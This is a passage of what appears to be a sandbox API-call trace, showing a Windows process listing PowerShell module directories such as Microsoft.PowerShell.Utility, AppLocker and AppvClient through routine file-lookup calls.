ftLastAccessTime.dwLowDateTime=0x25cef0c7, ftLastAccessTime.dwHighDateTime=0x1da9889, ftLastWriteTime.dwLowDateTime=0xcbddf8a3, ftLastWriteTime.dwHighDateTime=0x1d5acde, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0332.131] FindNextFileW (in: hFindFile=0x1a89ab60, lpFindFileData=0x1b62e420 | out: lpFindFileData=0x1b62e420*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x3597a740, ftCreationTime.dwHighDateTime=0x1d5acde, ftLastAccessTime.dwLowDateTime=0xa7e4c9a8, ftLastAccessTime.dwHighDateTime=0x1d9a995, ftLastWriteTime.dwLowDateTime=0x3597a740, ftLastWriteTime.dwHighDateTime=0x1d5acde, nFileSizeHigh=0x0, nFileSizeLow=0x9a9, dwReserved0=0x0, dwReserved1=0x0, cFileName="Microsoft.PowerShell.Utility.psd1", cAlternateFileName="")) returned 1 [0332.131] FindNextFileW (in: hFindFile=0x1a89ab60, lpFindFileData=0x1b62e420 | out: lpFindFileData=0x1b62e420*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x3597a740, ftCreationTime.dwHighDateTime=0x1d5acde, ftLastAccessTime.dwLowDateTime=0x18b47e72, ftLastAccessTime.dwHighDateTime=0x1da9889, ftLastWriteTime.dwLowDateTime=0x3597a740, ftLastWriteTime.dwHighDateTime=0x1d5acde, nFileSizeHigh=0x0, nFileSizeLow=0x7780, dwReserved0=0x0, dwReserved1=0x0, cFileName="Microsoft.PowerShell.Utility.psm1", cAlternateFileName="")) returned 1 [0332.131] FindNextFileW (in: hFindFile=0x1a89ab60, lpFindFileData=0x1b62e420 | out: lpFindFileData=0x1b62e420*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x3597a740, ftCreationTime.dwHighDateTime=0x1d5acde, ftLastAccessTime.dwLowDateTime=0x18b47e72, ftLastAccessTime.dwHighDateTime=0x1da9889, ftLastWriteTime.dwLowDateTime=0x3597a740, ftLastWriteTime.dwHighDateTime=0x1d5acde, nFileSizeHigh=0x0, nFileSizeLow=0x7780, dwReserved0=0x0, dwReserved1=0x0, cFileName="Microsoft.PowerShell.Utility.psm1", cAlternateFileName="")) returned 0 [0332.131] FindClose (in: hFindFile=0x1a89ab60 | out: hFindFile=0x1a89ab60) returned 1 [0332.131] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1b62e348) returned 1 [0332.131] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1b62e568) returned 1 [0332.131] GetFileAttributesW (lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\Microsoft.PowerShell.Utility\\Microsoft.PowerShell.Utility.psd1" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\modules\\microsoft.powershell.utility\\microsoft.powershell.utility.psd1")) returned 0x20 [0332.131] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\Microsoft.PowerShell.Utility\\Microsoft.PowerShell.Utility.psd1", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x72 [0332.131] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\Microsoft.PowerShell.Utility\\Microsoft.PowerShell.Utility.psd1", nBufferLength=0x72, lpBuffer=0x1a808790, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\Microsoft.PowerShell.Utility\\Microsoft.PowerShell.Utility.psd1", lpFilePart=0x0) returned 0x71 [0332.131] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\Microsoft.PowerShell.Utility\\Microsoft.PowerShell.Utility.psd1", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x72 [0332.131] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\Microsoft.PowerShell.Utility\\Microsoft.PowerShell.Utility.psd1", nBufferLength=0x72, lpBuffer=0x1a808790, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\Microsoft.PowerShell.Utility\\Microsoft.PowerShell.Utility.psd1", lpFilePart=0x0) returned 0x71 [0332.132] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1b62e418) returned 1 [0332.132] GetFileAttributesExW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\Microsoft.PowerShell.Utility\\Microsoft.PowerShell.Utility.psd1" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\modules\\microsoft.powershell.utility\\microsoft.powershell.utility.psd1"), fInfoLevelId=0x0, lpFileInformation=0x2407c78 | out: lpFileInformation=0x2407c78*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x3597a740, ftCreationTime.dwHighDateTime=0x1d5acde, ftLastAccessTime.dwLowDateTime=0xa7e4c9a8, ftLastAccessTime.dwHighDateTime=0x1d9a995, ftLastWriteTime.dwLowDateTime=0x3597a740, ftLastWriteTime.dwHighDateTime=0x1d5acde, nFileSizeHigh=0x0, nFileSizeLow=0x9a9)) returned 1 [0332.132] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1b62e3c8) returned 1 [0332.132] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1b62e648) returned 1 [0332.132] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\Microsoft.PowerShell.Management", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x53 [0332.132] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\Microsoft.PowerShell.Management", nBufferLength=0x53, lpBuffer=0x1a808790, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\Microsoft.PowerShell.Management", lpFilePart=0x0) returned 0x52 [0332.132] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\Microsoft.PowerShell.Management\\*" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\modules\\microsoft.powershell.management\\*"), lpFindFileData=0x1b62e3f0 | out: lpFindFileData=0x1b62e3f0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xc89b8c5c, ftCreationTime.dwHighDateTime=0x1d5acde, ftLastAccessTime.dwLowDateTime=0x25cef0c7, ftLastAccessTime.dwHighDateTime=0x1da9889, ftLastWriteTime.dwLowDateTime=0xcbddf8a3, ftLastWriteTime.dwHighDateTime=0x1d5acde, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x1a89a020 [0332.133] FindNextFileW (in: hFindFile=0x1a89a020, lpFindFileData=0x1b62e420 | out: lpFindFileData=0x1b62e420*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xc89b8c5c, ftCreationTime.dwHighDateTime=0x1d5acde, ftLastAccessTime.dwLowDateTime=0x25cef0c7, ftLastAccessTime.dwHighDateTime=0x1da9889, ftLastWriteTime.dwLowDateTime=0xcbddf8a3, ftLastWriteTime.dwHighDateTime=0x1d5acde, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0332.133] FindNextFileW (in: hFindFile=0x1a89a020, lpFindFileData=0x1b62e420 | out: lpFindFileData=0x1b62e420*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x3597a740, ftCreationTime.dwHighDateTime=0x1d5acde, ftLastAccessTime.dwLowDateTime=0xa7ccf0e7, ftLastAccessTime.dwHighDateTime=0x1d9a995, ftLastWriteTime.dwLowDateTime=0x3597a740, ftLastWriteTime.dwHighDateTime=0x1d5acde, nFileSizeHigh=0x0, nFileSizeLow=0xa16, dwReserved0=0x0, dwReserved1=0x0, cFileName="Microsoft.PowerShell.Management.psd1", cAlternateFileName="")) returned 1 [0332.133] FindNextFileW (in: hFindFile=0x1a89a020, lpFindFileData=0x1b62e420 | out: lpFindFileData=0x1b62e420*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x3597a740, ftCreationTime.dwHighDateTime=0x1d5acde, ftLastAccessTime.dwLowDateTime=0xa7ccf0e7, ftLastAccessTime.dwHighDateTime=0x1d9a995, ftLastWriteTime.dwLowDateTime=0x3597a740, ftLastWriteTime.dwHighDateTime=0x1d5acde, nFileSizeHigh=0x0, nFileSizeLow=0xa16, dwReserved0=0x0, dwReserved1=0x0, cFileName="Microsoft.PowerShell.Management.psd1", cAlternateFileName="")) returned 0 [0332.133] FindClose (in: hFindFile=0x1a89a020 | out: hFindFile=0x1a89a020) returned 1 [0332.133] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1b62e348) returned 1 [0332.133] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1b62e568) returned 1 [0332.133] GetFileAttributesW (lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\Microsoft.PowerShell.Management\\Microsoft.PowerShell.Management.psd1" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\modules\\microsoft.powershell.management\\microsoft.powershell.management.psd1")) returned 0x20 [0332.133] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\Microsoft.PowerShell.Management\\Microsoft.PowerShell.Management.psd1", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x78 [0332.133] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\Microsoft.PowerShell.Management\\Microsoft.PowerShell.Management.psd1", nBufferLength=0x78, lpBuffer=0x1a808790, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\Microsoft.PowerShell.Management\\Microsoft.PowerShell.Management.psd1", lpFilePart=0x0) returned 0x77 [0332.134] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\Microsoft.PowerShell.Management\\Microsoft.PowerShell.Management.psd1", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x78 [0332.134] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\Microsoft.PowerShell.Management\\Microsoft.PowerShell.Management.psd1", nBufferLength=0x78, lpBuffer=0x1a808790, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\Microsoft.PowerShell.Management\\Microsoft.PowerShell.Management.psd1", lpFilePart=0x0) returned 0x77 [0332.134] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1b62e418) returned 1 [0332.134] GetFileAttributesExW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\Microsoft.PowerShell.Management\\Microsoft.PowerShell.Management.psd1" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\modules\\microsoft.powershell.management\\microsoft.powershell.management.psd1"), fInfoLevelId=0x0, lpFileInformation=0x2408628 | out: lpFileInformation=0x2408628*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x3597a740, ftCreationTime.dwHighDateTime=0x1d5acde, ftLastAccessTime.dwLowDateTime=0xa7cf5777, ftLastAccessTime.dwHighDateTime=0x1d9a995, ftLastWriteTime.dwLowDateTime=0x3597a740, ftLastWriteTime.dwHighDateTime=0x1d5acde, nFileSizeHigh=0x0, nFileSizeLow=0xa16)) returned 1 [0332.134] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1b62e3c8) returned 1 [0332.134] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1b62e648) returned 1 [0332.134] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\AppBackgroundTask", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x45 [0332.134] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\AppBackgroundTask", nBufferLength=0x45, lpBuffer=0x1a808790, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\AppBackgroundTask", lpFilePart=0x0) returned 0x44 [0332.134] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\AppBackgroundTask\\*" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\modules\\appbackgroundtask\\*"), lpFindFileData=0x1b62e3f0 | out: lpFindFileData=0x1b62e3f0*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0xc89b8c5c, ftCreationTime.dwHighDateTime=0x1d5acde, ftLastAccessTime.dwLowDateTime=0x25d15261, ftLastAccessTime.dwHighDateTime=0x1da9889, ftLastWriteTime.dwLowDateTime=0xcbd6d157, ftLastWriteTime.dwHighDateTime=0x1d5acde, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x1a89ac20 [0332.135] FindNextFileW (in: hFindFile=0x1a89ac20, lpFindFileData=0x1b62e420 | out: lpFindFileData=0x1b62e420*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0xc89b8c5c, ftCreationTime.dwHighDateTime=0x1d5acde, ftLastAccessTime.dwLowDateTime=0x25d15261, ftLastAccessTime.dwHighDateTime=0x1da9889, ftLastWriteTime.dwLowDateTime=0xcbd6d157, ftLastWriteTime.dwHighDateTime=0x1d5acde, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0332.135] FindNextFileW (in: hFindFile=0x1a89ac20, lpFindFileData=0x1b62e420 | out: lpFindFileData=0x1b62e420*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xeb8a4b7a, ftCreationTime.dwHighDateTime=0x1d5acdd, ftLastAccessTime.dwLowDateTime=0xf5fef5a2, ftLastAccessTime.dwHighDateTime=0x1d94211, ftLastWriteTime.dwLowDateTime=0xeb8a4b7a, ftLastWriteTime.dwHighDateTime=0x1d5acdd, nFileSizeHigh=0x0, nFileSizeLow=0x3ab, dwReserved0=0x0, dwReserved1=0x0, cFileName="AppBackgroundTask.psd1", cAlternateFileName="")) returned 1 [0332.135] FindNextFileW (in: hFindFile=0x1a89ac20, lpFindFileData=0x1b62e420 | out: lpFindFileData=0x1b62e420*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xeb8a4b7a, ftCreationTime.dwHighDateTime=0x1d5acdd, ftLastAccessTime.dwLowDateTime=0xeb8a4b7a, ftLastAccessTime.dwHighDateTime=0x1d5acdd, ftLastWriteTime.dwLowDateTime=0xeb8a4b7a, ftLastWriteTime.dwHighDateTime=0x1d5acdd, nFileSizeHigh=0x0, nFileSizeLow=0x2200, dwReserved0=0x0, dwReserved1=0x0, cFileName="Microsoft.Windows.AppBackgroundTask.Commands.dll", cAlternateFileName="")) returned 1 [0332.135] FindNextFileW (in: hFindFile=0x1a89ac20, lpFindFileData=0x1b62e420 | out: lpFindFileData=0x1b62e420*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xeb8a4b7a, ftCreationTime.dwHighDateTime=0x1d5acdd, ftLastAccessTime.dwLowDateTime=0xeb8a4b7a, ftLastAccessTime.dwHighDateTime=0x1d5acdd, ftLastWriteTime.dwLowDateTime=0xeb8a4b7a, ftLastWriteTime.dwHighDateTime=0x1d5acdd, nFileSizeHigh=0x0, nFileSizeLow=0x2138, dwReserved0=0x0, dwReserved1=0x0, cFileName="MSFT_BackgroundTask.Format.ps1xml", cAlternateFileName="")) returned 1 [0332.135] FindNextFileW (in: hFindFile=0x1a89ac20, lpFindFileData=0x1b62e420 | out: lpFindFileData=0x1b62e420*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xeb8a4b7a, ftCreationTime.dwHighDateTime=0x1d5acdd, ftLastAccessTime.dwLowDateTime=0xeb8a4b7a, ftLastAccessTime.dwHighDateTime=0x1d5acdd, ftLastWriteTime.dwLowDateTime=0xeb8a4b7a, ftLastWriteTime.dwHighDateTime=0x1d5acdd, nFileSizeHigh=0x0, nFileSizeLow=0xc61, dwReserved0=0x0, dwReserved1=0x0, cFileName="PS_BackgroundTask.cdxml", cAlternateFileName="")) returned 1 [0332.135] FindNextFileW (in: hFindFile=0x1a89ac20, lpFindFileData=0x1b62e420 | out: lpFindFileData=0x1b62e420*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xeb8a4b7a, ftCreationTime.dwHighDateTime=0x1d5acdd, ftLastAccessTime.dwLowDateTime=0xeb8a4b7a, ftLastAccessTime.dwHighDateTime=0x1d5acdd, ftLastWriteTime.dwLowDateTime=0xeb8a4b7a, ftLastWriteTime.dwHighDateTime=0x1d5acdd, nFileSizeHigh=0x0, nFileSizeLow=0xc61, dwReserved0=0x0, dwReserved1=0x0, cFileName="PS_BackgroundTask.cdxml", cAlternateFileName="")) returned 0 [0332.135] FindClose (in: hFindFile=0x1a89ac20 | out: hFindFile=0x1a89ac20) returned 1 [0332.135] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1b62e348) returned 1 [0332.135] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1b62e568) returned 1 [0332.135] GetFileAttributesW (lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\AppBackgroundTask\\AppBackgroundTask.psd1" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\modules\\appbackgroundtask\\appbackgroundtask.psd1")) returned 0x20 [0332.136] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\AppBackgroundTask\\AppBackgroundTask.psd1", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x5c [0332.136] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\AppBackgroundTask\\AppBackgroundTask.psd1", nBufferLength=0x5c, lpBuffer=0x1a808790, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\AppBackgroundTask\\AppBackgroundTask.psd1", lpFilePart=0x0) returned 0x5b [0332.136] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\AppBackgroundTask\\AppBackgroundTask.psd1", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x5c [0332.136] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\AppBackgroundTask\\AppBackgroundTask.psd1", nBufferLength=0x5c, lpBuffer=0x1a808790, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\AppBackgroundTask\\AppBackgroundTask.psd1", lpFilePart=0x0) returned 0x5b [0332.136] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1b62e418) returned 1 [0332.136] GetFileAttributesExW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\AppBackgroundTask\\AppBackgroundTask.psd1" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\modules\\appbackgroundtask\\appbackgroundtask.psd1"), fInfoLevelId=0x0, lpFileInformation=0x2408fe0 | out: lpFileInformation=0x2408fe0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xeb8a4b7a, ftCreationTime.dwHighDateTime=0x1d5acdd, ftLastAccessTime.dwLowDateTime=0xdaf67bdc, ftLastAccessTime.dwHighDateTime=0x1d94215, ftLastWriteTime.dwLowDateTime=0xeb8a4b7a, ftLastWriteTime.dwHighDateTime=0x1d5acdd, nFileSizeHigh=0x0, nFileSizeLow=0x3ab)) returned 1 [0332.136] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1b62e3c8) returned 1 [0332.136] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1b62e648) returned 1 [0332.136] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\AppLocker", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x3d [0332.136] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\AppLocker", nBufferLength=0x3d, lpBuffer=0x1a808790, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\AppLocker", lpFilePart=0x0) returned 0x3c [0332.137] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\AppLocker\\*" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\modules\\applocker\\*"), lpFindFileData=0x1b62e3f0 | out: lpFindFileData=0x1b62e3f0*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0x6d90540, ftCreationTime.dwHighDateTime=0x1d5ace4, ftLastAccessTime.dwLowDateTime=0x25d15261, ftLastAccessTime.dwHighDateTime=0x1da9889, ftLastWriteTime.dwLowDateTime=0x744502b, ftLastWriteTime.dwHighDateTime=0x1d5ace4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x1a899cc0 [0332.137] FindNextFileW (in: hFindFile=0x1a899cc0, lpFindFileData=0x1b62e420 | out: lpFindFileData=0x1b62e420*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0x6d90540, ftCreationTime.dwHighDateTime=0x1d5ace4, ftLastAccessTime.dwLowDateTime=0x25d15261, ftLastAccessTime.dwHighDateTime=0x1da9889, ftLastWriteTime.dwLowDateTime=0x744502b, ftLastWriteTime.dwHighDateTime=0x1d5ace4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0332.137] FindNextFileW (in: hFindFile=0x1a899cc0, lpFindFileData=0x1b62e420 | out: lpFindFileData=0x1b62e420*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x279a8c87, ftCreationTime.dwHighDateTime=0x1d5acde, ftLastAccessTime.dwLowDateTime=0xf601581c, ftLastAccessTime.dwHighDateTime=0x1d94211, ftLastWriteTime.dwLowDateTime=0x279a8c87, ftLastWriteTime.dwHighDateTime=0x1d5acde, nFileSizeHigh=0x0, nFileSizeLow=0x422, dwReserved0=0x0, dwReserved1=0x0, cFileName="AppLocker.psd1", cAlternateFileName="")) returned 1 [0332.137] FindNextFileW (in: hFindFile=0x1a899cc0, lpFindFileData=0x1b62e420 | out: lpFindFileData=0x1b62e420*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x279a8c87, ftCreationTime.dwHighDateTime=0x1d5acde, ftLastAccessTime.dwLowDateTime=0xf601581c, ftLastAccessTime.dwHighDateTime=0x1d94211, ftLastWriteTime.dwLowDateTime=0x279a8c87, ftLastWriteTime.dwHighDateTime=0x1d5acde, nFileSizeHigh=0x0, nFileSizeLow=0x422, dwReserved0=0x0, dwReserved1=0x0, cFileName="AppLocker.psd1", cAlternateFileName="")) returned 0 [0332.137] FindClose (in: hFindFile=0x1a899cc0 | out: hFindFile=0x1a899cc0) returned 1 [0332.137] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1b62e348) returned 1 [0332.137] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1b62e568) returned 1 [0332.137] GetFileAttributesW (lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\AppLocker\\AppLocker.psd1" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\modules\\applocker\\applocker.psd1")) returned 0x20 [0332.138] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\AppLocker\\AppLocker.psd1", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x4c [0332.138] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\AppLocker\\AppLocker.psd1", nBufferLength=0x4c, lpBuffer=0x1a808790, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\AppLocker\\AppLocker.psd1", lpFilePart=0x0) returned 0x4b [0332.138] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\AppLocker\\AppLocker.psd1", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x4c [0332.138] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\AppLocker\\AppLocker.psd1", nBufferLength=0x4c, lpBuffer=0x1a808790, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\AppLocker\\AppLocker.psd1", lpFilePart=0x0) returned 0x4b [0332.138] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1b62e418) returned 1 [0332.138] GetFileAttributesExW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\AppLocker\\AppLocker.psd1" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\modules\\applocker\\applocker.psd1"), fInfoLevelId=0x0, lpFileInformation=0x2409720 | out: lpFileInformation=0x2409720*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x279a8c87, ftCreationTime.dwHighDateTime=0x1d5acde, ftLastAccessTime.dwLowDateTime=0xdafb4283, ftLastAccessTime.dwHighDateTime=0x1d94215, ftLastWriteTime.dwLowDateTime=0x279a8c87, ftLastWriteTime.dwHighDateTime=0x1d5acde, nFileSizeHigh=0x0, nFileSizeLow=0x422)) returned 1 [0332.138] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1b62e3c8) returned 1 [0332.138] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1b62e648) returned 1 [0332.138] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\AppvClient", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x3e [0332.138] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\AppvClient", nBufferLength=0x3e, lpBuffer=0x1a808790, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\AppvClient", lpFilePart=0x0) returned 0x3d [0332.141] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\AppvClient\\*" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\modules\\appvclient\\*"), lpFindFileData=0x1b62e3f0 | out: lpFindFileData=0x1b62e3f0*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0x6d90540, ftCreationTime.dwHighDateTime=0x1d5ace4, ftLastAccessTime.dwLowDateTime=0x25d15261, ftLastAccessTime.dwHighDateTime=0x1da9889, ftLastWriteTime.dwLowDateTime=0x744502b, ftLastWriteTime.dwHighDateTime=0x1d5ace4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x1a899960 [0332.141] FindNextFileW (in: hFindFile=0x1a899960, lpFindFileData=0x1b62e420 | out: lpFindFileData=0x1b62e420*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0x6d90540, ftCreationTime.dwHighDateTime=0x1d5ace4, ftLastAccessTime.dwLowDateTime=0x25d15261, ftLastAccessTime.dwHighDateTime=0x1da9889, ftLastWriteTime.dwLowDateTime=0x744502b, ftLastWriteTime.dwHighDateTime=0x1d5ace4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0332.141] FindNextFileW (in: hFindFile=0x1a899960, lpFindFileData=0x1b62e420 | out: lpFindFileData=0x1b62e420*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x25ed4aeb, ftCreationTime.dwHighDateTime=0x1d5acde, ftLastAccessTime.dwLowDateTime=0xf603bb55, ftLastAccessTime.dwHighDateTime=0x1d94211, ftLastWriteTime.dwLowDateTime=0x25ed4aeb, ftLastWriteTime.dwHighDateTime=0x1d5acde, nFileSizeHigh=0x0, nFileSizeLow=0x2b2, dwReserved0=0x0, dwReserved1=0x0, cFileName="AppvClient.psd1", cAlternateFileName="")) returned 1 [0332.141] FindNextFileW (in: hFindFile=0x1a899960, lpFindFileData=0x1b62e420 | out: lpFindFileData=0x1b62e420*(dwFileAttributes=0x20, 